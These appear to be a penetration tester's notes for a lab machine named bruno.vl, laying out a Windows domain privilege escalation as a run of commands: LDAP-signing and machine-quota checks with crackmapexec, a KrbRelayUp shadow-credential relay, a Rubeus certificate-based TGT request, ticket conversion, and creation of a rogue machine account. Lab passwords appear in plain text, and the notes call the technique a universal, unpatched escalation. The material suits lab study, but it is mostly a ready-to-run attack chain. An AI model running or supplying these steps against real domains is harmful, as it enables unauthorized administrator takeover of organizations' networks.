This is essentially a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
# Check if LDAP signing is not enforced
cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker
# Check if we can use a shadow credential attack. We can abuse shadow credentials if PKINT is supported by DC, through cme we can verify the machine qouta
cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq
# Get CLSIDs
c980e4c2-c178-4572-935d-a8a429884806
90f18417-f0f1-484e-9d3c-59dceee5dbd8
03ca98d6-ff5d-49b8-abc6-03dd84127020
d99e6e73-fc88-11d0-b498-00a0c90312f3 (certsrv.exe)
42cbfaa7-a4a7-47bb-b422-bd10e9d02700
000c101c-0000-0000-c000-000000000046
1b48339c-d15e-45f3-ad55-a851cb66be6b
49e6370b-ab71-40ab-92f4-b009593e4518
50d185b9-fff3-4656-92c7-e4018da4361d
3c6859ce-230b-48a4-be6c-932c0c202048 (trusted installer service)
# https://vulndev.io/cheats-windows/
Attack with Shadow Account
Purpose: Create a shadow account for existing machine account and abuse it to get a TGT for Administrator
# KrbRelayUp attack for shadow account with certificate
.\KrbRelayUp.exe full -m shadowcred -f -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
# Get tgt
Rubeus.exe asktgt /user:<DC name> /certificate:<base 64 of certificate> /password:<Certificate Password> /enctype:<PKINIT etype> /nowrap
PS> .\Rubeus.exe asktgt /user:brunodc$ /certificate:MIIKSA...<snip> /password:xP9-kA9#oX0# /enctype:AES256 /nowrap
# Ensure that the ticket is issued to the machine account.
# Conver the ticket
# copy and paste the base64 ticket to a bruno_ticket file
cat ./bruno_ticket | base64 -d > bruno_ticket.kirbi
ticketConverter.py bruno_ticket.kirbi bruno_ticket.ccache
# Create a new machine account
./Sharpmad.exe MAQ -Action new -MachineAccount evil -MachinePassword Pass.123
# Get the SID of new account
PS> $o = ([ADSI]"LDAP://CN=evil,CN=Computers,DC=bruno,DC=vl").objectSID
PS> (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
